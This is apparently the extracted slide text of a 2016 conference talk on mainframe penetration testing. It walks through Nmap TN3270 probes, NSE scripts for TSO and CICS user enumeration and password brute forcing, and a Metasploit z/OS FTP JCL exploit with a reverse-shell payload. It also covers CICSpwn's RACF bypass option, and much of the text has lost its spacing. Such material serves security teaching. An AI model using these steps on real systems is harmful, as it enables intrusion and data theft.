Advanced mainframe hacking

VANGUARD SECURITY & COMPLIANCE 2016

Philip Young ZedSec 390

CST08

Advanced Mainframe Hacking

SECURITY & COMPLIANCE CONFERENCE 2016


Disclaimer

I’m not here in the name of or on behalf of my employer. All opinions expressed here are my own.

About Me!


Purpose

This session will: • GooverthetoolsintroducedinMondayskeynote

• Explainwhat’sgoingonbehindthescenes

• Showyouhowtousethetools


Tools Covered

• Nmap • Metasploit • CICSpwn • ELV.APF


Platform

• Linux (Kali Linux) • Vmware • macOS • VPS


Kali Linux

• A Linux distribution • Comes pre-loaded with multiple tools:

• BURP• Metasploit• BeeF• Manymore

DEMO


Nmap

• Created in 1997 • By: Fyodor • Mostly ‘C’ • Includes Service Detection • Added Scripting Engine in ‘07


Nmap

• Network MAP • Uses various techniques to discover open ports

• E.G. “Syn Scan”


Service Probes

• Identify what is running on a port • Uses TCP/UDP probes


Nmap Probes

• Use the flag: ‘-sV’ • Null Probe:

MatchesdatasenttoNmap• Approx 4,000 ‘Null Probes’ Let’s look at TN3270*: match tn3270 m|^\xff\xfd\x1d| p/IBM Telnet TN3270/ i/3270-REGIME/

* line 4606 in nmap-service-probes


TN3270 Null Probe

match -> ‘Matchthefollowing’ Tn3270 -> ‘with tn3270’ m|^\xff\xfd\x1d| \xff\xfd\x1d = IAC DO TN3270E p/IBM Telnet TN3270/ = Set to ‘IBM Telnet…’


Other Probes

• TCP Probes • Send Data, inspect reply • For example Network Job Entry Probe:


NJE Probe

• Sends an invalid NJE ‘OPEN’ packet

• Waits for either ‘ACK’ or ‘NAK’ in EBCDIC

Nmap without Service Probes

Nmap WITH Service Probes


Nmap Scripting Engine (NSE) • Composed of Libraries and scripts • Over 530 scripts available • 121 Libraries • Uses Lua


NSE Categories

AUTH BROADCAST BRUTE DEFAULT DISCOVERY DOS EXPLOIT

EXTERNAL FUZZER INTRUSIVE MALWARE SAFE VERSION VULN


TN3270 NSE Library

• A ‘virtual’ TN3270 terminal written in Lua

• Available: https://github.com/zedsec390/NMAP

• Allows for the following:


Invoke

• To invoke scripts use the flag --script

(\ is line continuation in linux)

nmap -sV\ --script tn3270-screen


Additional TN3270 Scripts • VTAM Applid Enumeration • TSO:

• UserIDEnumeraFon• PasswordBruteForce

• CICS: • TransacFonEnumeraFon• UserIDEnumeraFon• UserPasswordBruteForcing


Additional TN3270 Scripts • VTAM Applid Enumeration • TSO:

• UserIDEnumeraFon• PasswordBruteForce

• CICS: • TransacFonEnumeraFon• UserIDEnumeraFon• UserPasswordBruteForcing


TSO User Enumeration • Let’s walk through the arguments:

•  NotetheLibraries:brute&unpwdb

Argument Defini5on

brute.maxthreads=100MaxnumberofconcurrentconnecFons.Setto100.

userdb=‘/tmp/users.txt’Filewithusernamesyouwanttotest.

tso-enum.commands=‘TSOL5’ThecommandusedtogettoTSO.


CICS Transaction Enumeration Argument Defini5on

brute.maxthreads=100MaxnumberofconcurrentconnecFons.Setto100.

idlist=‘/tmp/users.txt’FilewithCICStransacFonsyou’relookingfor.

cics-enum.commands=‘CICSTS29’ThecommandusedtogettotheCICSregion.

cics-enum.path=‘/home/test’SuccessfullyidenFfiedtransacFonscreenshotswillbeplacedinthisfolder.

DEMO


Metasploit Framework

• Developed by H.D. Moore 2003 • Moved to Ruby in 2007 • Created an easy to use exploit platform

• Chad Rikansrud (@bigendiansmalls) add JCL and z/OS architecture support in 2016


Using MSF

• Run ‘msfconsole’ • To list all exploits: show exploits • Run the ONLY z/os ‘exploit’ use exploit/mainframe/ftp/ftp_jcl_creds

• Show the options with: show options • Fill in the options you need • Select which ‘payload’ you want to use


Set options

• Exploit options: Op5on Defini5on

FTPUSER UserIDtouse.

FTPPASS Passwordtouse.

RHOSTFTPHostname/IPaddressoftargetLPAR

RPORT FTPport(useNmap)


Metasploit Payload Options Now select a payload: set payload cmd/mainframe/reverse_shell_jcl Change the payload options: Op5on Defini5on

LHOST OurHostnameorIPaddress

LPORT Theportyouwantmetasploittoopenalisteneron.

DEMO


CICSpwn

• Release this year by Ayoul • Relies on CEMT/CEDA transaction IDs (for now)

• Uses CEMT to upload and execute JCL/REXX

• Can be used to assess CICS and break in to environments

• Requires Python 2.7


Interesting Options

Invoke with: python cicspwn Flag Defini5on

-i GatherinformaFon

-A TestallopFons

-sUploadJCLtobeexecutedbyCICSuser(requiresCEMT)

--bypass WillbypassRACFifCEDAisavailable.

DEMO

Where To From Here?


Escalation

• So far only network based • What happens after access is granted?


Some Ideas

• Storage ‘scrapers’ to gather system information (think ‘IPLINFO’ but built in to metasploit)

• Automated APF tools to attempt privilege escalation through zapping APF authorized modules

• Data dumping tools to grab all datasets • SMP/E corruption


Why Not?

• Make your own tools? I’d prefer the tools come with what the experts need, so they have it without knowing about it

Contact: [email protected] @mainframed767


Thank you!

SECURITY & COMPLIANCE CONFERENCE 2016

Advanced mainframe hacking

Technology